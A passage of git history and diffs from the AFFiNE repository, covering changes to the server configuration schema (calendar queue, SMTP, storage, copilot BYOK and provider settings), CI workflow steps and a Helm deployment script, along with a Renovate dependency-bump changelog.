2026-02-14 00:43:36 +08:00
DarkSky 98e5747fdc feat: merge service 2026-02-13 21:52:11 +08:00
DarkSky 4460604dd3 fix: migration compatibility 2026-02-13 03:12:26 +08:00
DarkSky b4be9118ad feat: doc status & share status (#14426)
#### PR Dependency Tree


* **PR #14426** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Admin dashboard: view workspace analytics (storage, sync activity, top
shared links) with charts and configurable windows.
* Document analytics tab: see total/unique/guest views and trends over
selectable time windows.
* Last-accessed members: view who last accessed a document, with
pagination.
* Shared links analytics: browse and paginate all shared links with
view/unique/guest metrics and share URLs.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-13 01:01:29 +08:00
Lakr b46bf91575 fix(ios): add AI privacy consent alert (#14421)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **New Features**
* Added AI feature consent flow requiring user agreement before enabling
AI capabilities.
* Added calendar integration support including CalDAV account linking
and management.
* Expanded workspace administration capabilities with detailed workspace
analytics and configuration options.

* **Improvements**
  * Enhanced workspace sharing and configuration controls.
  * Added support for calendar provider presets and subscriptions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-12 18:25:18 +08:00
DarkSky 3ad482351b fix: server init (#14412)
#### PR Dependency Tree


* **PR #14412** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
  * Improved internal code organization for better maintainability.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-10 16:18:22 +08:00
DarkSky 03b1d15a8f chore: adjust resource 2026-02-10 14:41:43 +08:00
renovate[bot] 52c7b04a01 chore: bump up @vitejs/plugin-react-swc version to v4 (#14405)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@vitejs/plugin-react-swc](https://redirect.github.com/vitejs/vite-plugin-react/tree/main/packages/plugin-react-swc#readme)
([source](https://redirect.github.com/vitejs/vite-plugin-react/tree/HEAD/packages/plugin-react-swc))
| [`^3.7.2` →
`^4.0.0`](https://renovatebot.com/diffs/npm/@vitejs%2fplugin-react-swc/3.9.0/4.2.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@vitejs%2fplugin-react-swc/4.2.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@vitejs%2fplugin-react-swc/3.9.0/4.2.3?slim=true)
|

---

### Release Notes

<details>
<summary>vitejs/vite-plugin-react
(@&#8203;vitejs/plugin-react-swc)</summary>

###
[`v4.2.3`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#423-2026-02-02)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/5e600a31ec27fae54df58a46ef1fffa80238042e...12914fa8c1d32323db6a134d46cd0ca83db91cd1)

###
[`v4.2.2`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#422-2025-11-12)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/v4.2.1...5e600a31ec27fae54df58a46ef1fffa80238042e)

##### Update code to support newer `rolldown-vite`
([#&#8203;978](https://redirect.github.com/vitejs/vite-plugin-react/pull/978))

`rolldown-vite` will remove `optimizeDeps.rollupOptions` in favor of
`optimizeDeps.rolldownOptions` soon. This plugin now uses
`optimizeDeps.rolldownOptions` to support newer `rolldown-vite`. Please
update `rolldown-vite` to the latest version if you are using an older
version.

###
[`v4.2.1`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#421-2025-11-05)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/v4.2.0...v4.2.1)

##### Fix `@vitejs/plugin-react-swc/preamble` on build
([#&#8203;962](https://redirect.github.com/vitejs/vite-plugin-react/pull/962))

###
[`v4.2.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#420-2025-10-24)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/v4.1.0...v4.2.0)

##### Add `@vitejs/plugin-react-swc/preamble` virtual module for SSR HMR
([#&#8203;890](https://redirect.github.com/vitejs/vite-plugin-react/pull/890))

SSR applications can now initialize HMR runtime by importing
`@vitejs/plugin-react-swc/preamble` at the top of their client entry
instead of manually calling `transformIndexHtml`. This simplifies SSR
setup for applications that don't use the `transformIndexHtml` API.

##### Use SWC when useAtYourOwnRisk\_mutateSwcOptions is provided
([#&#8203;951](https://redirect.github.com/vitejs/vite-plugin-react/pull/951))

Previously, this plugin did not use SWC if plugins were not provided
even if `useAtYourOwnRisk_mutateSwcOptions` was provided. This is now
fixed.

###
[`v4.1.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#410-2025-09-17)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/f21864b102d40fca4f70dfe9112a10101ec12f54...v4.1.0)

##### Set SWC cacheRoot options

This is set to `{viteCacheDir}/swc` and override the default of `.swc`.

##### Perf: simplify refresh wrapper generation
([#&#8203;835](https://redirect.github.com/vitejs/vite-plugin-react/pull/835))

###
[`v4.0.1`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#401-2025-08-19)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/590f394c1e451987258ed64a4b5fb6207c5e8261...f21864b102d40fca4f70dfe9112a10101ec12f54)

##### Set `optimizeDeps.rollupOptions.transform.jsx` instead of
`optimizeDeps.rollupOptions.jsx` for rolldown-vite
([#&#8203;735](https://redirect.github.com/vitejs/vite-plugin-react/pull/735))

`optimizeDeps.rollupOptions.jsx` is going to be deprecated in favor of
`optimizeDeps.rollupOptions.transform.jsx`.

###
[`v4.0.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#400-2025-08-07)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/9e0c1038959e828865be810a164a51c3db1ac375...590f394c1e451987258ed64a4b5fb6207c5e8261)

###
[`v3.11.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3110-2025-07-18)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/32d49ecf9b15e3070c7abe5a176252a3fe542e5c...9e0c1038959e828865be810a164a51c3db1ac375)

##### Add HMR support for compound components
([#&#8203;518](https://redirect.github.com/vitejs/vite-plugin-react/pull/518))

HMR now works for compound components like this:

```tsx
const Root = () => <div>Accordion Root</div>
const Item = () => <div>Accordion Item</div>

export const Accordion = { Root, Item }
```

##### Return `Plugin[]` instead of `PluginOption[]`
([#&#8203;537](https://redirect.github.com/vitejs/vite-plugin-react/pull/537))

The return type has changed from `react(): PluginOption[]` to more
specialized type `react(): Plugin[]`. This allows for type-safe
manipulation of plugins, for example:

```tsx
// previously this causes type errors
react()
  .map(p => ({ ...p, applyToEnvironment: e => e.name === 'client' }))
```

###
[`v3.10.2`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3102-2025-06-10)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/8ce7183265c43f88623655a9cfdcec5282068f9b...32d49ecf9b15e3070c7abe5a176252a3fe542e5c)

##### Suggest `@vitejs/plugin-react-oxc` if rolldown-vite is detected
[#&#8203;491](https://redirect.github.com/vitejs/vite-plugin-react/pull/491)

Emit a log which recommends `@vitejs/plugin-react-oxc` when
`rolldown-vite` is detected to improve performance and use Oxc under the
hood. The warning can be disabled by setting `disableOxcRecommendation:
true` in the plugin options.

##### Use `optimizeDeps.rollupOptions` instead of
`optimizeDeps.esbuildOptions` for rolldown-vite
[#&#8203;489](https://redirect.github.com/vitejs/vite-plugin-react/pull/489)

This suppresses the warning about `optimizeDeps.esbuildOptions` being
deprecated in rolldown-vite.

##### Add Vite 7-beta to peerDependencies range
[#&#8203;497](https://redirect.github.com/vitejs/vite-plugin-react/pull/497)

React plugins are compatible with Vite 7, this removes the warning when
testing the beta.

###
[`v3.10.1`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3101-2025-06-03)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/dcadcfc2841c0bedfe44279c556835c350dfa5fa...8ce7183265c43f88623655a9cfdcec5282068f9b)

##### Add explicit semicolon in preambleCode
[#&#8203;485](https://redirect.github.com/vitejs/vite-plugin-react/pull/485)

This fixes an edge case when using HTML minifiers that strips line
breaks aggressively.

###
[`v3.10.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3100-2025-05-23)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/4a944487aabe4db16660f4196e1d6eed79edf0e0...dcadcfc2841c0bedfe44279c556835c350dfa5fa)

##### Add `filter` for rolldown-vite
[#&#8203;470](https://redirect.github.com/vitejs/vite-plugin-react/pull/470)

Added `filter` so that it is more performant when running this plugin
with rolldown-powered version of Vite.

##### Skip HMR preamble in Vitest browser mode
[#&#8203;478](https://redirect.github.com/vitejs/vite-plugin-react/pull/478)

This was causing annoying `Sourcemap for "/@&#8203;react-refresh" points
to missing source files` and is unnecessary in test mode.

##### Skip HMR for JSX files with hooks
[#&#8203;480](https://redirect.github.com/vitejs/vite-plugin-react/pull/480)

This removes the HMR warning for hooks with JSX.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45NS4yIiwidXBkYXRlZEluVmVyIjoiNDIuOTUuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-02-10 03:22:15 +00:00
2568 changed files with 189465 additions and 67118 deletions
+5
View File
@@ -19,3 +19,8 @@ rustflags = [
# pthread_key_create() destructors and segfault after a DSO unloading
[target.'cfg(all(target_env = "gnu", not(target_os = "windows")))']
rustflags = ["-C", "link-args=-Wl,-z,nodelete"]
# Temporary local llm_adapter override.
# Uncomment when verifying AFFiNE against the sibling llm_adapter workspace.
# [patch.crates-io]
# llm_adapter = { path = "../llm_adapter" }
+113 -82
View File
@@ -62,6 +62,18 @@
"concurrency": 10
}
},
"queues.calendar": {
"type": "object",
"description": "The config for calendar job queue\n@default {\"concurrency\":4}",
"properties": {
"concurrency": {
"type": "number"
}
},
"default": {
"concurrency": 4
}
},
"queues.doc": {
"type": "object",
"description": "The config for doc job queue\n@default {\"concurrency\":1}",
@@ -123,17 +135,17 @@
},
"throttlers.default": {
"type": "object",
"description": "The config for the default throttler.\n@default {\"ttl\":60,\"limit\":120}",
"description": "The config for the default throttler.\n@default {\"ttl\":60000,\"limit\":120}",
"default": {
"ttl": 60,
"ttl": 60000,
"limit": 120
}
},
"throttlers.strict": {
"type": "object",
"description": "The config for the strict throttler.\n@default {\"ttl\":60,\"limit\":20}",
"description": "The config for the strict throttler.\n@default {\"ttl\":60000,\"limit\":20}",
"default": {
"ttl": 60,
"ttl": 60000,
"limit": 20
}
}
@@ -163,6 +175,11 @@
"description": "Whether require email verification before accessing restricted resources(not implemented).\n@default true",
"default": true
},
"newAccountShareActionDelay": {
"type": "number",
"description": "Minimum account age in seconds before new accounts can invite members or create share links.\n@default 86400",
"default": 86400
},
"passwordRequirements": {
"type": "object",
"description": "The password strength requirements when set new password.\n@default {\"min\":8,\"max\":32}",
@@ -197,8 +214,8 @@
"properties": {
"SMTP.name": {
"type": "string",
"description": "Name of the email server (e.g. your domain name)\n@default \"AFFiNE Server\"\n@environment `MAILER_SERVERNAME`",
"default": "AFFiNE Server"
"description": "Hostname used for SMTP HELO/EHLO (e.g. mail.example.com). Leave empty to use the system hostname.\n@default \"\"\n@environment `MAILER_SERVERNAME`",
"default": ""
},
"SMTP.host": {
"type": "string",
@@ -222,7 +239,7 @@
},
"SMTP.sender": {
"type": "string",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted <noreply@example.com>\")\n@default \"AFFiNE Self Hosted <noreply@example.com>\"\n@environment `MAILER_SENDER`",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted &lt;noreply@example.com&gt;\")\n@default \"AFFiNE Self Hosted <noreply@example.com>\"\n@environment `MAILER_SENDER`",
"default": "AFFiNE Self Hosted <noreply@example.com>"
},
"SMTP.ignoreTLS": {
@@ -237,8 +254,8 @@
},
"fallbackSMTP.name": {
"type": "string",
"description": "Name of the fallback email server (e.g. your domain name)\n@default \"AFFiNE Server\"",
"default": "AFFiNE Server"
"description": "Hostname used for fallback SMTP HELO/EHLO (e.g. mail.example.com). Leave empty to use the system hostname.\n@default \"\"",
"default": ""
},
"fallbackSMTP.host": {
"type": "string",
@@ -262,7 +279,7 @@
},
"fallbackSMTP.sender": {
"type": "string",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted <noreply@example.com>\")\n@default \"\"",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted &lt;noreply@example.com&gt;\")\n@default \"\"",
"default": ""
},
"fallbackSMTP.ignoreTLS": {
@@ -288,6 +305,22 @@
}
}
},
"permission": {
"type": "object",
"description": "Configuration for permission module",
"properties": {
"readModel": {
"type": "string",
"description": "Permission data source for Rust evaluation\n@default \"projection\"\n@environment `AFFINE_PERMISSION_READ_MODEL`",
"default": "projection"
},
"fallbackLegacyLoader": {
"type": "boolean",
"description": "Fallback from projection loader to legacy loader when projection input loading fails\n@default false\n@environment `AFFINE_PERMISSION_FALLBACK_LEGACY_LOADER`",
"default": false
}
}
},
"storages": {
"type": "object",
"description": "Configuration for storages module",
@@ -341,7 +374,7 @@
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
"description": "The S3 compatible endpoint (used by aws-s3 provider). Optional; if omitted, endpoint is derived from region."
},
"region": {
"type": "string",
@@ -408,10 +441,6 @@
"type": "object",
"description": "The config for the S3 compatible storage provider.",
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
},
"region": {
"type": "string",
"description": "The region for the storage provider. Example: \"us-east-1\" or \"auto\" for R2."
@@ -461,6 +490,13 @@
"type": "string",
"description": "The account id for the cloudflare r2 storage provider."
},
"jurisdiction": {
"type": "string",
"enum": [
"eu"
],
"description": "Optional jurisdiction for the cloudflare r2 endpoint. Set to \"eu\" for EU buckets."
},
"usePresignedURL": {
"type": "object",
"description": "The presigned url config for the cloudflare r2 storage provider.",
@@ -536,7 +572,7 @@
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
"description": "The S3 compatible endpoint (used by aws-s3 provider). Optional; if omitted, endpoint is derived from region."
},
"region": {
"type": "string",
@@ -603,10 +639,6 @@
"type": "object",
"description": "The config for the S3 compatible storage provider.",
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
},
"region": {
"type": "string",
"description": "The region for the storage provider. Example: \"us-east-1\" or \"auto\" for R2."
@@ -656,6 +688,13 @@
"type": "string",
"description": "The account id for the cloudflare r2 storage provider."
},
"jurisdiction": {
"type": "string",
"enum": [
"eu"
],
"description": "Optional jurisdiction for the cloudflare r2 endpoint. Set to \"eu\" for EU buckets."
},
"usePresignedURL": {
"type": "object",
"description": "The presigned url config for the cloudflare r2 storage provider.",
@@ -843,11 +882,14 @@
"properties": {
"google": {
"type": "object",
"description": "Google Calendar integration config\n@default {\"enabled\":false,\"clientId\":\"\",\"clientSecret\":\"\",\"externalWebhookUrl\":\"\",\"webhookVerificationToken\":\"\"}\n@link https://developers.google.com/calendar/api/guides/push",
"description": "Google Calendar integration config\n@default {\"enabled\":false,\"allowNewAccounts\":true,\"clientId\":\"\",\"clientSecret\":\"\",\"externalWebhookUrl\":\"\",\"webhookVerificationToken\":\"\",\"requestTimeoutMs\":10000}\n@link https://developers.google.com/calendar/api/guides/push",
"properties": {
"enabled": {
"type": "boolean"
},
"allowNewAccounts": {
"type": "boolean"
},
"clientId": {
"type": "string"
},
@@ -859,14 +901,19 @@
},
"webhookVerificationToken": {
"type": "string"
},
"requestTimeoutMs": {
"type": "number"
}
},
"default": {
"enabled": false,
"allowNewAccounts": true,
"clientId": "",
"clientSecret": "",
"externalWebhookUrl": "",
"webhookVerificationToken": ""
"webhookVerificationToken": "",
"requestTimeoutMs": 10000
}
},
"caldav": {
@@ -969,24 +1016,35 @@
"description": "Whether to enable the copilot plugin. <br> Document: <a href=\"https://docs.affine.pro/self-host-affine/administer/ai\" target=\"_blank\">https://docs.affine.pro/self-host-affine/administer/ai</a>\n@default false",
"default": false
},
"scenarios": {
"byok.enabled": {
"type": "boolean",
"description": "Whether to enable workspace BYOK.\n@default true",
"default": true
},
"byok.allowedProviders": {
"type": "array",
"description": "The allowlist for workspace BYOK providers.\n@default [\"openai\",\"anthropic\",\"gemini\",\"fal\"]",
"default": [
"openai",
"anthropic",
"gemini",
"fal"
]
},
"byok.allowCustomEndpoint": {
"type": "boolean",
"description": "Whether workspace BYOK custom endpoints are accepted.\n@default false",
"default": false
},
"providers.profiles": {
"type": "array",
"description": "The profile list for copilot providers.\n@default []",
"default": []
},
"providers.defaults": {
"type": "object",
"description": "Use custom models in scenarios and override default settings.\n@default {\"override_enabled\":false,\"scenarios\":{\"audio_transcribing\":\"gemini-2.5-flash\",\"chat\":\"gemini-2.5-flash\",\"embedding\":\"gemini-embedding-001\",\"image\":\"gpt-image-1\",\"rerank\":\"gpt-4.1\",\"coding\":\"claude-sonnet-4-5@20250929\",\"complex_text_generation\":\"gpt-4o-2024-08-06\",\"quick_decision_making\":\"gpt-5-mini\",\"quick_text_generation\":\"gemini-2.5-flash\",\"polish_and_summarize\":\"gemini-2.5-flash\"}}",
"default": {
"override_enabled": false,
"scenarios": {
"audio_transcribing": "gemini-2.5-flash",
"chat": "gemini-2.5-flash",
"embedding": "gemini-embedding-001",
"image": "gpt-image-1",
"rerank": "gpt-4.1",
"coding": "claude-sonnet-4-5@20250929",
"complex_text_generation": "gpt-4o-2024-08-06",
"quick_decision_making": "gpt-5-mini",
"quick_text_generation": "gemini-2.5-flash",
"polish_and_summarize": "gemini-2.5-flash"
}
}
"description": "The default provider ids for model output types and global fallback.\n@default {}",
"default": {}
},
"providers.openai": {
"type": "object",
@@ -996,6 +1054,14 @@
"baseURL": "https://api.openai.com/v1"
}
},
"providers.cloudflareWorkersAi": {
"type": "object",
"description": "The config for the Cloudflare Workers AI provider.\n@default {\"apiToken\":\"\",\"accountId\":\"\"}",
"default": {
"apiToken": "",
"accountId": ""
}
},
"providers.fal": {
"type": "object",
"description": "The config for the fal provider.\n@default {\"apiKey\":\"\"}",
@@ -1046,13 +1112,6 @@
},
"default": {}
},
"providers.perplexity": {
"type": "object",
"description": "The config for the perplexity provider.\n@default {\"apiKey\":\"\"}",
"default": {
"apiKey": ""
}
},
"providers.anthropic": {
"type": "object",
"description": "The config for the anthropic provider.\n@default {\"apiKey\":\"\",\"baseURL\":\"https://api.anthropic.com/v1\"}",
@@ -1096,11 +1155,6 @@
},
"default": {}
},
"providers.morph": {
"type": "object",
"description": "The config for the morph provider.\n@default {}",
"default": {}
},
"unsplash": {
"type": "object",
"description": "The config for the unsplash key.\n@default {\"key\":\"\"}",
@@ -1159,7 +1213,7 @@
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
"description": "The S3 compatible endpoint (used by aws-s3 provider). Optional; if omitted, endpoint is derived from region."
},
"region": {
"type": "string",
@@ -1226,10 +1280,6 @@
"type": "object",
"description": "The config for the S3 compatible storage provider.",
"properties": {
"endpoint": {
"type": "string",
"description": "The S3 compatible endpoint. Example: \"https://s3.us-east-1.amazonaws.com\" or \"https://<account>.r2.cloudflarestorage.com\"."
},
"region": {
"type": "string",
"description": "The region for the storage provider. Example: \"us-east-1\" or \"auto\" for R2."
@@ -1279,6 +1329,13 @@
"type": "string",
"description": "The account id for the cloudflare r2 storage provider."
},
"jurisdiction": {
"type": "string",
"enum": [
"eu"
],
"description": "Optional jurisdiction for the cloudflare r2 endpoint. Set to \"eu\" for EU buckets."
},
"usePresignedURL": {
"type": "object",
"description": "The presigned url config for the cloudflare r2 storage provider.",
@@ -1353,22 +1410,6 @@
}
}
},
"customerIo": {
"type": "object",
"description": "Configuration for customerIo module",
"properties": {
"enabled": {
"type": "boolean",
"description": "Enable customer.io integration\n@default false",
"default": false
},
"token": {
"type": "string",
"description": "Customer.io token\n@default \"\"",
"default": ""
}
}
},
"oauth": {
"type": "object",
"description": "Configuration for oauth module",
@@ -1467,16 +1508,6 @@
"description": "Whether enable lifetime price and allow user to pay for it.\n@default true",
"default": true
},
"apiKey": {
"type": "string",
"description": "[Deprecated] Stripe API key. Use payment.stripe.apiKey instead.\n@default \"\"\n@environment `STRIPE_API_KEY`",
"default": ""
},
"webhookKey": {
"type": "string",
"description": "[Deprecated] Stripe webhook key. Use payment.stripe.webhookKey instead.\n@default \"\"\n@environment `STRIPE_WEBHOOK_KEY`",
"default": ""
},
"stripe": {
"type": "object",
"description": "Stripe sdk options and credentials\n@default {\"apiKey\":\"\",\"webhookKey\":\"\"}\n@link https://docs.stripe.com/api",
+2 -2
View File
@@ -3,6 +3,6 @@ contact_links:
- name: Something else?
url: https://github.com/toeverything/AFFiNE/discussions
about: Feel free to ask and answer questions over in GitHub Discussions
- name: AFFiNE Community Support
url: https://community.affine.pro
- name: AFFiNE Community Support (Discord)
url: https://affine.pro/redirect/discord
about: AFFiNE Community - a place to ask, learn and engage with others
+20
View File
@@ -0,0 +1,20 @@
self-hosted-runner:
# Labels of self-hosted runner in array of strings.
labels:
- win-signer
# Configuration variables in array of strings defined in your repository or
# organization. `null` means disabling configuration variables check.
# Empty array means no configuration variable is allowed.
config-variables: null
# Configuration for file paths. The keys are glob patterns to match to file
# paths relative to the repository root. The values are the configurations for
# the file paths. Note that the path separator is always '/'.
# The following configurations are available.
#
# "ignore" is an array of regular expression patterns. Matched error messages
# are ignored. This is similar to the "-ignore" command line option.
paths:
# .github/workflows/**/*.yml:
# ignore: []
+17 -4
View File
@@ -50,8 +50,21 @@ runs:
# https://github.com/tree-sitter/tree-sitter/issues/4186
# pass -D_BSD_SOURCE to clang to fix the tree-sitter build issue
run: |
echo "CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
echo "TARGET_CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
if [[ "${{ inputs.target }}" == "aarch64-unknown-linux-gnu" ]]; then
# napi cross-toolchain 1.0.3 headers miss AT_HWCAP2 in elf.h
echo "CC=clang -D_BSD_SOURCE -DAT_HWCAP2=26" >> "$GITHUB_ENV"
echo "TARGET_CC=clang -D_BSD_SOURCE -DAT_HWCAP2=26" >> "$GITHUB_ENV"
else
echo "CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
echo "TARGET_CC=clang -D_BSD_SOURCE" >> "$GITHUB_ENV"
fi
- name: Prepare cache key
id: cache-key
shell: bash
run: |
shared_key="$(printf '%s' "${{ inputs.target }}-${{ inputs.package }}" | tr -c 'A-Za-z0-9_.-' '-')"
echo "shared-key=$shared_key" >> "$GITHUB_OUTPUT"
- name: Cache cargo
uses: Swatinem/rust-cache@v2
@@ -59,7 +72,7 @@ runs:
with:
workspaces: ${{ env.DEV_DRIVE_WORKSPACE }}
save-if: ${{ github.ref_name == 'canary' }}
shared-key: ${{ inputs.target }}-${{ inputs.package }}
shared-key: ${{ steps.cache-key.outputs.shared-key }}
env:
CARGO_HOME: ${{ env.DEV_DRIVE }}/.cargo
RUSTUP_HOME: ${{ env.DEV_DRIVE }}/.rustup
@@ -69,7 +82,7 @@ runs:
if: ${{ runner.os != 'Windows' }}
with:
save-if: ${{ github.ref_name == 'canary' }}
shared-key: ${{ inputs.target }}-${{ inputs.package }}
shared-key: ${{ steps.cache-key.outputs.shared-key }}
- name: Build
shell: bash
+19 -14
View File
@@ -25,30 +25,30 @@ const buildType = BUILD_TYPE || 'canary';
const isProduction = buildType === 'stable';
const isBeta = buildType === 'beta';
const isCanary = buildType === 'canary';
const isInternal = buildType === 'internal';
const isSpotEnabled = isBeta || isCanary;
const replicaConfig = {
stable: {
front: Number(process.env.PRODUCTION_FRONT_REPLICA) || 2,
graphql: Number(process.env.PRODUCTION_GRAPHQL_REPLICA) || 2,
doc: Number(process.env.PRODUCTION_DOC_REPLICA) || 2,
},
beta: {
front: Number(process.env.BETA_FRONT_REPLICA) || 1,
graphql: Number(process.env.BETA_GRAPHQL_REPLICA) || 1,
doc: Number(process.env.BETA_DOC_REPLICA) || 1,
},
canary: { front: 1, graphql: 1, doc: 1 },
canary: { front: 1, graphql: 1 },
};
const cpuConfig = {
beta: { front: '1', graphql: '1', doc: '1' },
canary: { front: '500m', graphql: '1', doc: '500m' },
beta: { front: '1', graphql: '1' },
canary: { front: '500m', graphql: '1' },
};
const memoryConfig = {
beta: { front: '1Gi', graphql: '1Gi', doc: '1Gi' },
canary: { front: '512Mi', graphql: '512Mi', doc: '512Mi' },
beta: { front: '2Gi', graphql: '1Gi' },
canary: { front: '512Mi', graphql: '512Mi' },
};
const createHelmCommand = ({ isDryRun }) => {
@@ -72,10 +72,12 @@ const createHelmCommand = ({ isDryRun }) => {
`--set-string global.indexer.endpoint="${AFFINE_INDEXER_SEARCH_ENDPOINT}"`,
`--set-string global.indexer.apiKey="${AFFINE_INDEXER_SEARCH_API_KEY}"`,
];
const cloudSqlNodeSelector = isBeta
? `{ \\"iam.gke.io/gke-metadata-server-enabled\\": \\"true\\", \\"cloud.google.com/gke-spot\\": \\"true\\" }`
: `{ \\"iam.gke.io/gke-metadata-server-enabled\\": \\"true\\" }`;
const serviceAnnotations = [
`--set-json front.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${APP_IAM_ACCOUNT}\\" }"`,
`--set-json graphql.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${APP_IAM_ACCOUNT}\\" }"`,
`--set-json doc.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${APP_IAM_ACCOUNT}\\" }"`,
].concat(
isProduction || isBeta || isInternal
? [
@@ -84,10 +86,17 @@ const createHelmCommand = ({ isDryRun }) => {
`--set-json front.services.renderer.annotations="{ \\"cloud.google.com/neg\\": \\"{\\\\\\"ingress\\\\\\": true}\\" }"`,
`--set-json graphql.service.annotations="{ \\"cloud.google.com/neg\\": \\"{\\\\\\"ingress\\\\\\": true}\\" }"`,
`--set-json cloud-sql-proxy.serviceAccount.annotations="{ \\"iam.gke.io/gcp-service-account\\": \\"${CLOUD_SQL_IAM_ACCOUNT}\\" }"`,
`--set-json cloud-sql-proxy.nodeSelector="{ \\"iam.gke.io/gke-metadata-server-enabled\\": \\"true\\" }"`,
`--set-json cloud-sql-proxy.nodeSelector="${cloudSqlNodeSelector}"`,
]
: []
);
const spotNodeSelector = `{ \\"cloud.google.com/gke-spot\\": \\"true\\" }`;
const spotScheduling = isSpotEnabled
? [
`--set-json front.nodeSelector="${spotNodeSelector}"`,
`--set-json graphql.nodeSelector="${spotNodeSelector}"`,
]
: [];
const cpu = cpuConfig[buildType];
const memory = memoryConfig[buildType];
@@ -96,14 +105,12 @@ const createHelmCommand = ({ isDryRun }) => {
resources = resources.concat([
`--set front.resources.requests.cpu="${cpu.front}"`,
`--set graphql.resources.requests.cpu="${cpu.graphql}"`,
`--set doc.resources.requests.cpu="${cpu.doc}"`,
]);
}
if (memory) {
resources = resources.concat([
`--set front.resources.requests.memory="${memory.front}"`,
`--set graphql.resources.requests.memory="${memory.graphql}"`,
`--set doc.resources.requests.memory="${memory.doc}"`,
]);
}
@@ -142,10 +149,8 @@ const createHelmCommand = ({ isDryRun }) => {
`--set graphql.replicaCount=${replica.graphql}`,
`--set-string graphql.image.tag="${imageTag}"`,
`--set-string graphql.app.host="${primaryHost}"`,
`--set-string doc.image.tag="${imageTag}"`,
`--set-string doc.app.host="${primaryHost}"`,
`--set doc.replicaCount=${replica.doc}`,
...serviceAnnotations,
...spotScheduling,
...resources,
`--timeout 10m`,
flag,
+7 -7
View File
@@ -53,7 +53,7 @@ runs:
fi
- name: Setup Node.js
uses: actions/setup-node@v4
